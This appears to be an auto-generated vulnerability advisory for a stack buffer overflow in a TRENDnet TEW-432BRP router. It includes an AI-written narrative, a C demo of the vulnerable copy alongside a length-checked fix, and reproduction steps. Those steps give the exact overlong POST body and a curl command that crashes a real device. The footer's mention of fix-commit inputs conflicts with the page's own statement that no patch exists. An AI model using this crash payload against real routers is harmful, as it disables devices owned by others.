VYPR
High severity (8.8) · NVD Advisory · Published May 31, 2026

CVE-2026-10183

Description

Stack-based buffer overflow in TRENDnet TEW-432BRP router's formWlanSetup function allows remote unauthenticated attackers to execute arbitrary code via a crafted enrollee parameter.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Vulnerability

The TRENDnet TEW-432BRP router, firmware version 3.10B20, is vulnerable to a stack-based buffer overflow in the /goform/formWlanSetup endpoint. The enrollee request parameter is copied into a fixed-size stack buffer without length validation, so an overlong value overflows that buffer. The affected code is the formWlanSetup function in the boa web-server binary. [1]

Exploitation

An unauthenticated attacker can send a crafted POST request to http://<router-ip>/goform/formWlanSetup with an overly long enrollee value. The overflow overwrites the saved return address, enabling arbitrary code execution. A proof-of-concept that crashes the router is publicly available. [1]

Impact

Successful exploitation allows remote attackers to execute arbitrary code on the router, likely with root privileges, leading to full device compromise. This could result in data theft, network eavesdropping, or further attacks on internal networks.

Mitigation

The product has been end-of-life since 2009 and is no longer supported. TRENDnet has stated they cannot replicate or fix the vulnerability. Users should replace the device with a supported model. There is no available patch. [1]

AI Insight generated on May 31, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected products: 2

Patches: 0 (no patches discovered yet)

Vulnerability mechanics

Root cause

"Missing input length validation in the formWlanSetup function allows an unbounded stack copy of the enrollee parameter, causing a stack-based buffer overflow."

Attack vector

An unauthenticated remote attacker sends a crafted HTTP POST request to `/goform/formWlanSetup` with an overly long `enrollee` parameter in the form body [1]. The attacker needs network access to the router's web interface (typically port 80) and can send the payload from a browser or any scripting tool [1]. Because the input is copied onto the stack unchecked, the long string overwrites the saved return address, enabling arbitrary code execution [1].

Affected code

The vulnerability resides in the `formWlanSetup` function, the handler for the `/goform/formWlanSetup` endpoint in the boa web-server binary on the TRENDnet TEW-432BRP router (firmware version 3.10B20) [1]. The function copies the attacker-supplied `enrollee` parameter directly into a stack-based local buffer without any length check [1].

What the fix does

No patch is available. The vendor states the product has been end-of-life since 2009 and will not replicate or fix any vulnerabilities [1]. The researcher recommends that the length of string parameters be validated at the input extraction stage, which prevents the unbounded copy that leads to the stack overflow [1]. Users of this unsupported device should replace it with a supported product.

Preconditions

  • Network access to the router's web interface (typically port 80)
  • No authentication required (the published PoC sends a Basic auth header, but the advisory does not list authentication as a precondition)

Reproduction

Send an HTTP POST request to `http://<router-ip>/goform/formWlanSetup` with `Content-Type: application/x-www-form-urlencoded` and a body containing `setPIN=Start+PIN&enrollee=` followed by a long string of `a` characters (e.g., 847 bytes total) and `&webpage=wlan_wps.asp` [1]. The router will crash and become unresponsive [1].
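As an added example (not code from the firmware, the advisory, or TRENDnet), the C program below models the handler pattern described in this section together with the reproduction above: a form-variable lookup, a vulnerable copy of `enrollee` into a fixed-size local buffer, and, going beyond the page, a hardened copy that enforces the length at extraction as the researcher recommends. The buffer size `BUF_SZ`, the helper `form_value`, the sentinel return-address value and the frame layout are assumptions; the real boa helpers and sizes are not public. The PoC body is constructed inline in the shape the reproduction gives (the published PoC's Basic auth header is not reproduced). The handler's stack frame is modelled as a struct inside a heap arena so the clobbered return address can be read back instead of crashing the process.

```c
/* Added example, not code from the TEW-432BRP firmware or the advisory. It models
 * the bug above: a boa form handler copies the "enrollee" parameter into a fixed
 * stack buffer with no length check. BUF_SZ, form_value() and the frame layout are
 * assumptions; the frame lives in a heap arena so the overwrite is observable. */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define BUF_SZ      64u                        /* assumed local buffer size */
#define SENTINEL_RA ((uintptr_t)0x0BADF00Du)   /* stands in for the real return address */
struct frame {
    char      enrollee[BUF_SZ];   /* local buffer the parameter lands in */
    uintptr_t saved_ra;           /* return address saved just above the locals */
};

/* Find name=value in an x-www-form-urlencoded body (no percent-decoding; the
 * PoC value is a plain run of 'a'). Returns the value length, 0 if absent. */
static size_t form_value(const char *body, const char *name, const char **val)
{
    size_t nlen = strlen(name);
    const char *p = body;
    while (p && *p) {
        if (strncmp(p, name, nlen) == 0 && p[nlen] == '=') {
            *val = p + nlen + 1;
            const char *end = strchr(*val, '&');
            return end ? (size_t)(end - *val) : strlen(*val);
        }
        if ((p = strchr(p, '&')) != NULL) p++;   /* next "name=value" pair */
    }
    *val = "";
    return 0;
}

/* VULNERABLE pattern: the copy is bounded only by the attacker's input. */
__attribute__((noinline)) static void vulnerable_copy(struct frame *f, const char *body)
{
    const char *v;
    size_t n = form_value(body, "enrollee", &v);
    char *dst = f->enrollee;
    for (size_t i = 0; i < n; i++)       /* i is never checked against BUF_SZ */
        *dst++ = v[i];
    *dst = '\0';
}

/* HARDENED: bound the length at extraction, as the researcher recommends. */
static int hardened_copy(struct frame *f, const char *body)
{
    const char *v;
    size_t n = form_value(body, "enrollee", &v);
    if (n >= BUF_SZ) return -1;          /* too long: refuse and copy nothing */
    memcpy(f->enrollee, v, n);
    f->enrollee[n] = '\0';
    return 0;
}

static struct frame *new_frame(size_t body_len)   /* arena large enough to absorb the copy */
{
    struct frame *f = calloc(1, sizeof *f + body_len + 1);
    if (!f) abort();
    f->saved_ra = SENTINEL_RA;
    return f;
}

/* Saved return address after the vulnerable handler processed body. */
uintptr_t run_vulnerable(const char *body)
{
    struct frame *f = new_frame(strlen(body));
    vulnerable_copy(f, body);
    uintptr_t ra = f->saved_ra;
    free(f);
    return ra;
}

/* 1 = rejected, frame intact; 2 = accepted, frame intact; 0 = frame clobbered. */
int run_hardened(const char *body)
{
    struct frame *f = new_frame(strlen(body));
    int rc = hardened_copy(f, body);
    int intact = f->saved_ra == SENTINEL_RA;
    free(f);
    return intact ? (rc < 0 ? 1 : 2) : 0;
}

/* Word filled with byte b: what saved_ra holds once the 'a' run reaches it. */
uintptr_t fill_word(unsigned char b) { uintptr_t w; memset(&w, b, sizeof w); return w; }

/* Constructed PoC body in the shape the reproduction gives, with n bytes of 'a'. */
char *poc_body(size_t n)
{
    const char *head = "setPIN=Start+PIN&enrollee=", *tail = "&webpage=wlan_wps.asp";
    size_t hl = strlen(head), tl = strlen(tail);
    char *b = malloc(hl + n + tl + 1);
    if (!b) abort();
    memcpy(b, head, hl);
    memset(b + hl, 'a', n);
    memcpy(b + hl + n, tail, tl + 1);
    return b;
}

int main(void)
{
    char *body = poc_body(847);           /* the advisory cites about 847 bytes */
    printf("vulnerable: saved_ra=0x%lx, sentinel 0x%lx\n",
           (unsigned long)run_vulnerable(body), (unsigned long)SENTINEL_RA);
    printf("hardened:   status=%d (1 = rejected, frame intact)\n", run_hardened(body));
    free(body);
    return 0;
}
```

Build with `cc -O2 -o wlan_demo wlan_demo.c` and run it: the first line shows the sentinel return address replaced by `0x6161616161616161` (the `a` run, little-endian on a 64-bit host), the second shows the hardened copy refusing the same body while the frame stays intact. The same body, written to a file, is what the reproduction sends to a real device with `curl -X POST -H 'Content-Type: application/x-www-form-urlencoded' --data-binary @body http://<router-ip>/goform/formWlanSetup`; expect the device to hang, as the reference reports, rather than return a response.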

Generated on May 31, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References: 5

News mentions: 0 (no linked articles in our index yet)